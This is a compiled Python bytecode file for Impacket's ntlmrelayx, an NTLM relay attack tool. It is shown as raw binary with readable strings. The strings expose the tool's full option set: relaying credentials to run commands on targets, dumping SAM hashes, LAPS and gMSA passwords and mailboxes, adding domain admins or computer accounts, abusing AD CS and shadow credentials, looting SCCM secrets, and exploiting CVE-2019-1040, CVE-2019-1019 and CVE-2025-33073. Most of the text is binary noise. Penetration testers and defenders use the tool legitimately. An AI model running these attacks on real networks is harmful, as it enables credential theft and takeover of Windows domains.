o
    àý°jj‚  ã                
   @   st  d dl Z d dlZd dlZd dlZzd dlmZmZmZ W n ey/   d dl	mZmZmZ Y nw d dl
mZ d dlZd dlmZ d dlmZ d dlmZ d dlmZ d dlmZmZmZmZmZmZmZmZmZ d d	lm Z m!Z! d d
l"m#Z#m$Z$ d dl%m&Z& g Z'G dd„ dej(ƒZ)dd„ Z*dd„ Z+e,dkr¸e-ej.ƒ e j/dddZ0de0j1_2e0j3ddddd e0j3dddd e0j3ddd d e0j3d!d"d#d$d%d& e0j3d'd#d(d)d& e0j3d*dd+d e0j3d,d-dd.d e0j3d/d0d#d1d2e j4d3 e0 5¡ Z6e6j3d4dd5d e6j3d6dd7d e6j3d8dd9d e6j3d:dd;d e6j3d<dd=d e6j3d>dd?d e6j3d@ddAd e6j3dBddCd e0j3dDe7dEdFdG e0j3dHdIdJdK e0j3dLe7dMdNdG e0j3dOe7dPdQdG e0j3dRe7dSdTdG e0j3dUe7dVdWdG e0j3dXe7dYdZdG e0j3d[ddd\d] e0j3d^ddd_d] e0j3d`daddbd e0j3dcd#ddded& e0j3dfdgd#e8ddhdidjdk e0j3dldmd#dnd e0j3dodpdddqdr e0j3dsd#dte 9¡  d e0j3dudddvdr e0j3dwd#ddxdr e0j3dydddzdr e0j3d{d|d}d~ e0j3dd€e7dd‚ e0j3dƒd„e7d…d‚ e0j3d†d‡d#dˆd e0j3d‰dŠd#e7d‹dŒd e0j3dŽdddd e0j3d‘dd’d e0j3d“dd”d e0j3d•d#d–d e0j3d—d#e8dd˜d™dš e0j3d›d#ddœd] e0 5d¡Z:e:j3džd#ddŸd d¡ e:j3d¢ddd£d] e:j3d¤d#g d¥¢ddd¦d§ e0 5d¨¡Z;e;j3d©dªd«gdªd¬d­ e;j3d®ddd¯d] e;j3d°d#dd±d²d³d´ e;j3dµd#dd¶d· e;j3d¸e7d¹dFgdFdºd» e;j3d¼d#d±d½dr e0 5d¾¡Z<e<j3d¿dÀdÁddÂdÃd¡ e0 5dÄ¡Z=e=j3dÅd#ddÆd] e=j3dÇd#d¶dÈd& e=j3dÉd#dÊd e=j3dËdddÌdr e0 5dÍ¡Z>e>j3dÎdÏddÐd] e>j3dÑdÏddÒd] e>j3dÓdÏddÔd] e>j3dÕdÏddÖd] e>j3d×d#ddØd] e>j3dÙdddÚd] e>j3dÛdddÜd] e>j3dÝdddÞd] e>j3dßdddàd] e>j3dádddâd] e>j3dãdäd#dåddædç e0 5dè¡Z?e?j3déd#dêddëdìdí e0 5dî¡Z@e@j3dïdðd#dñddòdódô e@j3dõdöd#d÷ddødùdô e@j3dúdûdddüd] e@j3dýdþd#e7dd dÿd  e0 5d¡ZAeAj3ddddd] eAj3dd#dddd eAj3dd#d	dd
d e0 5d¡ZBeBj3ddddd] eBj3dd#ddd] eBj3dd#ddd] eBj3dd#dddgdd„ ddd eBj3dd#ddd] e0 5d¡ZCeCj3ddddd] eCj3dd#ddd] eCj3d d#dd!d] e0 5d"¡ZDeDj3d#ddd$d] eDj3d%d#dd&d] eDj3d'd#dd(d] ze0 E¡ ZFW n eGyv ZH ze Ie8eHƒ¡ e Jd‹¡ W Y dZH[HndZH[Hww eFjKrŠeFjLsŠe Id)¡ e Jd‹¡ eFjMd*u r¿eFjN Od+¡ Pd,¡s¿e Id-¡ e Id.eeFjNƒjQ› d/eeFjNƒjR› d,¡ e Jd‹¡ eFjSd*u rôeFjN Od+¡ Pd0¡sôe Id1¡ e Id.eeFjNƒjQ› d/eeFjNƒjR› d0¡ e Jd‹¡ e TeFjUeFjV¡ d d2lWmXZX d d3lYmZZZ eFj[r&eFj[d   \¡ Z]e]d4ks e]dëkr&e ^d5¡ eFj_dur0eFj_Z_ne 9¡ Z_eFjNdurVe `d6¡ d7Zae#eFjNeXeFjbd8ZcecjdrUd*eF_en4eFjfdureFjgrke `d9¡ e Jd‹¡ e `d:¡ e#eFjfeXeFjbd;Zcd7Zane `d<¡ dZcd=ZaeFjhs“e' ie¡ eFjjsÆe' ie¡ ze!eFjkƒeF_kW n ely¹   e Id>¡ e Jd‹¡ Y nw eFjmdurÆe `d?¡ eFjnsÏe' ie¡ eFjosØe' ie¡ eFjpsæe' ie¡ e' ie¡ eFjqsïe' ie¡ eFjrsøe' ie¡ eFjsse' ie¡ ecdureFjtre$ecƒZueu v¡  ewƒ ZxdZyeFjzd*u rBe&eFj{eFj|feFj}d@Zyd*ey_~eeyjdAZ€d*e€_e€ v¡  ex ‚e€¡ dBeFvrSeFjƒrOdCndDeF_„e*eFexƒZ…eFjerce `dE¡ ne `dF¡ e-d±ƒ e `dG¡ zeFjzrŒe)e…exdH †eFj{eFj}¡dIZ‡e‡ ˆ¡  nej‰ Š¡  W n
 e‹yœ   Y nw 	 eFjzd*u rªey Œ¡  [yexD ]Z[q¬e Jd ¡ dS dS (J  é    N)ÚProxyHandlerÚbuild_openerÚRequest)Úurlparse)Úsleep)ÚThread)Úversion)Úlogger)	ÚSMBRelayServerÚHTTPRelayServerÚWCFRelayServerÚRAWRelayServerÚRPCRelayServerÚWinRMRelayServerÚWinRMSRelayServerÚMSSQLRelayServerÚRDPRelayServer)ÚNTLMRelayxConfigÚparse_listening_ports)ÚTargetsProcessorÚTargetsFileWatcher)ÚSOCKSc                   @   s`   e Zd Zdd„ Zedd„ ƒZdd„ Zdd„ Zd	d
„ Zdd„ Z	dd„ Z
dd„ Zdd„ Zdd„ ZdS )Ú	MiniShellc                 C   s:   t j | ¡ d| _|| _d | _|| _d| _|| _d| _	d S )Nzntlmrelayx> zType help for list of commandsT)
ÚcmdÚCmdÚ__init__ÚpromptÚapi_addressÚtidÚrelayConfigÚintroÚrelayThreadsÚserversRunning)Úselfr   Úthreadsr   © r%   úŠ/root/aizidognhua/tmp/workspace/projects/ec89d86c-575f-41c9-af57-ac45cbdbf775/venv/lib/python3.10/site-packages/../../../bin/ntlmrelayx.pyr   @   s   
zMiniShell.__init__c                    sš   g }t |ƒD ]\‰ }t‡ fdd„| D ƒƒ}| t|t|ƒƒ¡ qd dd„ t |ƒD ƒ¡}t|j|Ž ƒ td dd„ |D ƒ¡ƒ | D ]	}t|j|Ž ƒ qAd S )Nc                    s   g | ]}t |ˆ  ƒ‘qS r%   )Úlen)Ú.0Úrow©Úir%   r&   Ú
<listcomp>O   s    z(MiniShell.printTable.<locals>.<listcomp>ú c                 S   s   g | ]
\}}d ||f ‘qS )z	{%d:%ds} r%   )r(   ÚnumÚwidthr%   r%   r&   r,   R   s    z  c                 S   s   g | ]	}d t |dƒ ‘qS )ú-é   )Úmax)r(   ÚitemLenr%   r%   r&   r,   V   s    )Ú	enumerater2   Úappendr'   ÚjoinÚprintÚformat)ÚitemsÚheaderÚcolLenÚcolÚ	rowMaxLenÚoutputFormatr)   r%   r*   r&   Ú
printTableK   s   ÿzMiniShell.printTablec                 C   s   d S ©Nr%   )r#   r%   r%   r&   Ú	emptyline\   s   zMiniShell.emptylinec                 C   ó    | j jjD ]}t| ¡ ƒ qd S r@   )r   ÚtargetÚoriginalTargetsr7   Úgeturl©r#   ÚlineÚurlr%   r%   r&   Ú
do_targets_   ó   zMiniShell.do_targetsc                 C   rB   r@   )r   rC   ÚfinishedAttacksr7   rE   rF   r%   r%   r&   Údo_finished_attacksd   rJ   zMiniShell.do_finished_attacksc              
   C   s¦  g d¢}d  | j¡}zti ƒ}t|ƒ}t|ƒ}| |¡}| ¡ }t |¡}	W n t	yB }
 zt
 dt|
ƒ ¡ W Y d}
~
dS d}
~
ww t|	ƒdkrÌd|v r¸t| dd¡ d¡ƒd	kr¸| dd¡ d¡d }| dd¡ d¡d
 }|dkrwd
}n|dkr~d	}n|dkr…d}nt
 d¡ dS g }|	D ]}| ¡ ||  ¡ v r¡| |¡ qt|ƒdkr±| j||d dS t
 d¡ dS d|v rÃt
 d¡ dS | j|	|d dS t
 d¡ dS )zÂFilter are available :
 type : socks <filter> <value>
 filters : target, username, admin 
 values : 
   - target : IP or FQDN
   - username : domain/username
   - admin : true or false 
        )ÚProtocolÚTargetÚUsernameÚAdminStatusÚPortÚIDz$http://{}/ntlmrelayx/api/v1.0/relaysz	ERROR: %sNr   ú=ÚsocksÚ é   é   rC   ÚusernameÚadminr1   z*Expect : target / username / admin = value)r:   z#No relay matching filter available!z$Expect target/username/admin = valuezNo Relays Available!)r8   r   r   r   r   ÚopenÚreadÚjsonÚloadsÚ	ExceptionÚloggingÚerrorÚstrr'   ÚreplaceÚsplitÚinfoÚlowerr5   r?   )r#   rG   ÚheadersrH   Úproxy_handlerÚopenerÚresponseÚrÚresultr9   ÚeÚ_filterÚ_valueÚ_itemsr+   r%   r%   r&   Údo_socksi   sJ   

 €ÿ"

€zMiniShell.do_socksc                 C   s4   | j stt| jƒ d| _ t d¡ d S t d¡ d S )NTzRelay servers startedz"Relay servers are already running!)r"   Ústart_serversÚoptionsr!   r_   rd   r`   ©r#   rG   r%   r%   r&   Údo_startserversœ   s
   zMiniShell.do_startserversc                 C   s2   | j rt| jƒ d| _ t d¡ d S t d¡ d S )NFzRelay servers stoppedz"Relay servers are already stopped!)r"   Ústop_serversr!   r_   rd   r`   rs   r%   r%   r&   Údo_stopservers¤   s
   
zMiniShell.do_stopserversc                 C   s   t dƒ dS )NzShutting down, please wait!T)r7   rs   r%   r%   r&   Údo_exit¬   s   zMiniShell.do_exitc                 C   s
   |   |¡S r@   )rw   rs   r%   r%   r&   Údo_EOF°   s   
zMiniShell.do_EOFN)Ú__name__Ú
__module__Ú__qualname__r   Ústaticmethodr?   rA   rI   rL   rp   rt   rv   rw   rx   r%   r%   r%   r&   r   ?   s    
3r   c                 C   s”  t D ]Ä}tƒ }| t¡ | | jt¡ | t¡ | 	| j
¡ | | j¡ | | j¡ | | j¡ | | j¡ | | j¡ | t¡ | t¡ | t¡ | | j¡ | | j¡ | | j ¡ | !| j"| j#| j$| j%| j&| j| j'| j(| j)| j*| j+| j,¡ | -| j.| j/| j0| j1| j2| j3¡ | 4| j5¡ | 6| j7¡ | 8| j9| j:| j;| j<¡ | =| j>¡ | ?| j@| jA¡ | B| jC¡ | D| jE¡ | F| jG¡ | H| jI¡ | J| jK| jL| jM¡ | N| jO¡ | P| jQ¡ | R| jS¡ | T| jU¡ | V| jW| jX| jY| jZ¡ | [| j\¡ | ]| j^¡ | _| j`| ja¡ | b| jc| jd¡ | e| jf¡ |tgu r.| jhd ur.| d¡ | i| jh¡ |tjur<| jkr<| ld¡ |tgu ri| m| jn| jo| jp¡ | jqD ]}| r|¡ ||ƒ}| s¡  | t|¡ tudƒ qNq|tju ru| r| jv¡ nE|twu r| r| jx¡ n9|tyu r| r| jz¡ n-|t{u r™| r| j|¡ n!|t}u r¯| r| j~¡ | jr®| €| j¡ n|tu rº| r| j‚¡ ||ƒ}| s¡  | t|¡ q|S )NÚREDIRECTTgš™™™™™¹?)ƒÚRELAY_SERVERSr   ÚsetProtocolClientsÚPROTOCOL_CLIENTSÚsetRunSocksrT   ÚsocksServerÚ
setTargetsÚtargetSystemÚ
setExeFilerl   Ú
setCommandÚcÚsetEnumLocalAdminsÚenum_local_adminsÚsetAddComputerSMBÚadd_computerÚsetDisableMultiÚno_multirelayÚsetKeepRelayingÚkeep_relayingÚsetEncodingÚcodecÚsetModeÚmodeÚ
setAttacksÚPROTOCOL_ATTACKSÚ
setLootdirÚlootdirÚsetOutputFileÚoutput_fileÚsetdumpHashesÚdump_hashesÚsetLDAPOptionsÚno_dumpÚno_daÚno_aclÚno_validate_privsÚescalate_userÚdelegate_accessÚ	dump_lapsÚ	dump_gmsaÚ	dump_adcsÚsidÚadd_dns_recordÚsetRPCOptionsÚrpc_modeÚrpc_use_smbÚauth_smbÚ
hashes_smbÚrpc_smb_portÚicpr_ca_nameÚsetMSSQLOptionsÚqueryÚsetInteractiveÚinteractiveÚsetIMAPOptionsÚkeywordÚmailboxÚallÚimap_maxÚsetIPv6Úipv6ÚsetWpadOptionsÚ	wpad_hostÚwpad_auth_numÚsetSMB2SupportÚsmb2supportÚsetSMBChallengeÚntlmchallengeÚsetSMBRPCAttackÚ
rpc_attackÚsetInterfaceIpÚinterface_ipÚsetExploitOptionsÚ
remove_micÚremove_targetÚremove_sign_sealÚsetWebDAVOptionsÚserve_imageÚsetIsADCSAttackÚadcsÚsetADCSOptionsÚtemplateÚsetIsShadowCredentialsAttackÚshadow_credentialsÚsetShadowCredentialsOptionsÚshadow_targetÚpfx_passwordÚexport_typeÚcert_outfile_pathÚsetIsSCCMPoliciesAttackÚsccm_policiesÚsetIsSCCMDPAttackÚsccm_dpÚsetSCCMPoliciesOptionsÚsccm_policies_clientnameÚsccm_policies_sleepÚsetSCCMDPOptionsÚsccm_dp_extensionsÚsccm_dp_filesÚ
setAltNameÚaltnamer   rj   ÚsetRedirectHostr
   ÚrandomÚsetRandomTargetsÚsetDomainAccountÚmachine_accountÚmachine_hashesÚdomainÚ	http_portÚsetListeningPortÚstartÚaddr   Úsmb_portr   Úwcf_portr   Úraw_portr   Úrpc_portr   Ú
mssql_portÚmssql_dbÚ
setMSSQLDbr   Úrdp_port)rr   r$   Úserverr‡   ÚportÚsr%   r%   r&   rq   ³   s”   





8 ÿ










€
rq   c                 C   sJ   g }| D ]}t |ttƒƒr|j ¡  | |¡ q|D ]}|  |¡ ~qd S r@   )Ú
isinstanceÚtupler~   rõ   Úshutdownr5   Úremove)r$   ÚtodeleteÚthreadr%   r%   r&   ru     s   

€
þru   Ú__main__FzFor every connection received, this module will try to relay that connection to specified target(s) system or the original client)Úadd_helpÚdescriptionzMain optionsz-hz--helpÚhelpzshow this help message and exit)Úactionr  z-tsÚ
store_truez&Adds timestamp to every logging outputz-debugzTurn DEBUG output ONz-tz--targetÚstoreÚTARGETzàTarget to relay the credentials to, can be an IP, hostname or URL like domain\username@host:port (domain\username and port are optional, and don't forget to escape the '\'). If unspecified, it will relay back to the client'))r  Úmetavarr  z-tfÚTARGETSFILEz@File that contains targets by hostname or full URL, one per linez-wz\Watch the target file for changes and update target list automatically (only valid with -tf)z-iz--interactivezÂLaunch an smbclient, LDAP console or SQL shell insteadof executing a command after a successful relay. This console will listen locally on a  tcp port and can be reached with for example netcat.z-ipz--interface-ipÚINTERFACE_IPzLIP address of interface to bind relay servers ("0.0.0.0" or "::" if omitted))r  r  r  Údefaultz--no-smb-serverzDisables the SMB serverz--no-http-serverzDisables the HTTP serverz--no-wcf-serverzDisables the WCF serverz--no-raw-serverzDisables the RAW serverz--no-rpc-serverzDisables the RPC serverz--no-winrm-serverzDisables the WinRM serverz--no-mssql-serverzDisables the MSSQL serverz--no-rdp-serverzDisables the RDP serverz
--smb-portzPort to listen on smb serveri½  )Útyper  r	  z--http-portzPort(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`Ú80)r  r	  z
--wcf-portzPort to listen on wcf serveri­$  z
--raw-portzPort to listen on raw serveri
  z
--rpc-portzPort to listen on rpc serveré‡   z--mssql-portzPort to listen on mssql serveri™  z
--rdp-portzPort to listen on rdp serveri=  z--no-multirelayz7If set, disable multi-host relay (SMB and HTTP servers))r  Úrequiredr  z--keep-relayingzKIf set, keeps relaying to a target even after a successful connection on itz-raz--randomzRandomize target selectionz-rÚ	SMBSERVERz5Redirect HTTP requests to a file:// path on SMBSERVERz-lz	--lootdirÚLOOTDIRÚ.zdLoot directory in which gathered loot such as SAM dumps will be stored (default: current directory).)r  r
  r  r  r	  r  z-ofz--output-filezUbase output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2z-dhz--dump-hashesz$show encrypted hashes in the console)r  r	  r  z-codeca  Sets encoding used (codec) from the target's output (default "%s"). If errors are detected, run chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py again with -codec and the corresponding codec z-smb2supportzSMB2 Supportz-ntlmchallengezdSpecifies the NTLM server challenge used by the SMB Server (16 hex bytes long. eg: 1122334455667788)z-socksz/Launch a SOCKS proxy for the connection relayedz-socks-addressz	127.0.0.1z.SOCKS5 server address (also used for HTTP API))r	  r  z-socks-porti8  zSOCKS5 server port)r	  r
  r  z-http-api-porti‚#  zSOCKS5 HTTP API portz-whz--wpad-hostzgEnable serving a WPAD file for Proxy Authentication attack, setting the proxy host to the one supplied.z-waz--wpad-auth-numrW   zpPrompt for authentication N times for clients without MS16-077 installed before serving a WPAD file. (default=1))r  r
  r	  r  z-6z--ipv6zListen on IPv6z--remove-micz"Remove MIC (exploit CVE-2019-1040)z--remove-sign-sealzFRemove SIGN/SEAL-related NTLM negotiate flags (exploit CVE-2025-33073)z--serve-imagez8local path of the image that will we returned to clientsz-cÚCOMMANDzºCommand to execute on target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be in the same directory). For RPC no output will be provided.)r  r
  r  r  r  z
--mssql-dbzDatabase for MSSQL relayzSMB client optionsz-eÚFILEz|File to execute on the target system. If not specified, hashes will be dumped (secretsdump.py must be in the same directory))r  r  r  r  z--enum-local-adminszcIf relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)z--rpc-attack)NÚTSCHÚICPRz7Select the attack to perform over RPC over named pipes.)r  Úchoicesr  r	  r  zRPC client optionsz	-rpc-moder  r  zProtocol to attack)r  r	  r  z-rpc-use-smbzRelay DCE/RPC to SMB pipesz	-auth-smbrU   z[domain/]username[:password]zBUse this credential to authenticate to SMB (low-privilege account))r  r  r	  r  r  z-hashes-smbzLMHASH:NTHASH)r  r  r  z-rpc-smb-porté‹   z"Destination port to connect to SMB)r
  r  r	  r  z-icpr-ca-namezName of the CA for ICPR attackzMSSQL client optionsz-qz--queryr5   ÚQUERYz,MSSQL query to execute(can specify multiple)zHTTP optionsz-machine-accountzDomain machine account to use when interacting with the domain to grab a session key for signing, format is domain/machine_namez-machine-hashesz.Domain machine hashes, format is LMHASH:NTHASHz-domainz+Domain FQDN or IP to connect using NETLOGONz-remove-targetz`Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)zLDAP client optionsz	--no-dumpÚstore_falsez'Do not attempt to dump LDAP informationz--no-daz$Do not attempt to add a Domain Adminz--no-aclzDisable ACL attacksz--no-validate-privsziDo not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacksz--escalate-userz>Escalate privileges of this user instead of creating a new onez--delegate-accesszDDelegate access on relayed computer account to the specified accountz--sidz8Use a SID to delegate access rather than an account namez--dump-lapsz7Attempt to dump any LAPS passwords readable by the userz--dump-gmsaz7Attempt to dump any gMSA passwords readable by the userz--dump-adcszGAttempt to dump ADCS enrollment services and certificate templates infoz--add-dns-recordrV   )ÚNAMEÚIPADDRz:Add the <NAME> record to DNS via LDAP pointing to <IPADDR>)Únargsr  r  r  r  zCommon options for SMB and LDAPz--add-computer)ÚCOMPUTERNAMEÚPASSWORDÚ*zÊAttempt to add a new computer account via SMB or LDAP, depending on the specified target. This argument can be used either with the LDAP or the SMB service, as long as the target is a domain controller.)r  r  r  r  r  zIMAP client optionsz-kz	--keywordÚKEYWORDÚpasswordzYIMAP keyword to search for. If not specified, will search for mails containing "password")r  r  r  r	  r  z-mz	--mailboxÚMAILBOXÚINBOXz$Mailbox name to dump. Default: INBOXz-az--allz2Instead of searching for keywords, dump all emailsz-imz
--imap-maxz?Max number of emails to dump (0 = unlimited, default: no limit))r  r
  r  r	  r  zAD CS attack optionsz--adcszEnable AD CS relay attackz
--templateÚTEMPLATEz’AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`)r  r  r  r  z	--altnameÚALTNAMEzESubject Alternative Name to use when performing ESC1 or ESC6 attacks.z!Shadow Credentials attack optionsz--shadow-credentialszjEnable Shadow Credentials relay attack (msDS-KeyCredentialLink manipulation for PKINIT pre-authentication)z--shadow-targetzJtarget account (user or computer$) to populate msDS-KeyCredentialLink fromz--pfx-passwordzqpassword for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)z--export-typeÚPEMÚPFXc                 C   s   |   ¡ S r@   )Úupper)Úchoicer%   r%   r&   Ú<lambda>¯  s    r)  zNchoose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX)))r  r  r  r
  r	  r  z--cert-outfile-pathzJfilename to store the generated self-signed PEM or PFX certificate and keyzSCCM Policies attack optionsz--sccm-policieszÛEnable SCCM policies attack. Performs SCCM secret policies dump from a Management Point by registering a device. Works best when relaying a machine account. Expects as target 'http://<MP>/ccm_system_windowsauth/request'z--sccm-policies-clientnamezwThe name of the client that will be registered in order to dump secret policies. Defaults to the relayed account's namez--sccm-policies-sleepz^The number of seconds to sleep after the client registration before requesting secret policiesz&SCCM Distribution Point attack optionsz	--sccm-dpz˜Enable SCCM Distribution Point attack. Perform package file dump from an SCCM Distribution Point. Expects as target 'http://<DP>/sms_dp_smspkg$/Datalib'z--sccm-dp-extensionsz–A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfxz--sccm-dp-filesz´The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexingz+Set -auth-smb to relay DCE/RPC to SMB pipesTú/z/ccm_system_windowsauth/requestz‚When performing SCCM policies attack, the Management Point authenticated device registration endpoint should be provided as targetzFor instance: z://z/sms_dp_smspkg$/DatalibzdWhen performing SCCM DP attack, the Distribution Point Datalib endpoint should be provided as target)r€   )r•   Úwpadz²You are asking to add a `wpad` or a wildcard DNS name. This can cause disruption in larger networks (using multiple DNS subdomains) or if workstations already use a proxy config.z$Running in relay mode to single hostÚRELAY)ÚsingleTargetÚprotocolClientsÚ	randomizez[To add a machine account through SMB only the Domain Controller must be specified as targetz,Running in relay mode to hosts in targetfile)ÚtargetListFiler.  r/  zRunning in reflection modeÚ
REFLECTIONz5Incorrect specification of port range for HTTP serverz$Running HTTP server in redirect mode)Úserver_addressÚapi_port)rC   rÄ   z::z0.0.0.0zMultirelay disabledzMultirelay enabledz(Servers started, waiting for connectionsz{}:{})r   )ŽÚargparseÚsysr_   r   Úurllib.requestr   r   r   ÚImportErrorÚurllib2Úurllib.parser   r\   Útimer   Ú	threadingr   Úimpacketr   Úimpacket.examplesr	   Ú$impacket.examples.ntlmrelayx.serversr
   r   r   r   r   r   r   r   r   Ú)impacket.examples.ntlmrelayx.utils.configr   r   Ú/impacket.examples.ntlmrelayx.utils.targetsutilsr   r   Ú0impacket.examples.ntlmrelayx.servers.socksserverr   r~   r   r   rq   ru   ry   r7   ÚBANNERÚArgumentParserÚparserÚ
_optionalsÚtitleÚadd_argumentÚSUPPRESSÚadd_argument_groupÚserversoptionsÚintra   ÚgetdefaultencodingÚ
smboptionsÚ
rpcoptionsÚmssqloptionsÚhttpoptionsÚldapoptionsÚcommonoptionsÚimapoptionsÚadcsoptionsÚshadowcredentialsÚsccmpoliciesoptionsÚsccmdpoptionsÚ
parse_argsrr   r^   rl   r`   Úexitrª   r«   r×   rC   ÚrstripÚendswithÚschemeÚnetlocrÙ   ÚinitÚtsÚdebugÚ$impacket.examples.ntlmrelayx.clientsr€   Ú$impacket.examples.ntlmrelayx.attacksr•   r§   re   Údns_nameÚwarningr‘   rd   r“   rã   r„   ÚgeneralCandidatesr   Útfr‹   Úno_smb_serverr5   Úno_http_serverré   Ú
ValueErrorrj   Úno_wcf_serverÚno_raw_serverÚno_winrm_serverÚno_rpc_serverÚno_mssql_serverÚno_rdp_serverÚwÚwatchthreadrë   Úsetr$   r‚   rT   Úsocks_addressÚ
socks_portÚhttp_api_portÚdaemon_threadsÚserve_foreverÚsocks_threadÚdaemonrì   r¹   rÄ   r‡   r8   ÚshellÚcmdloopÚstdinr[   ÚKeyboardInterruptrú   r÷   r%   r%   r%   r&   Ú<module>   s  'ÿ,tS

ÿ
ü
ÿ

ÿ


ÿ
ÿ
ÿ


ÿÿ$ÿ€þ
&.
&.
€


þ










€ÿ  Å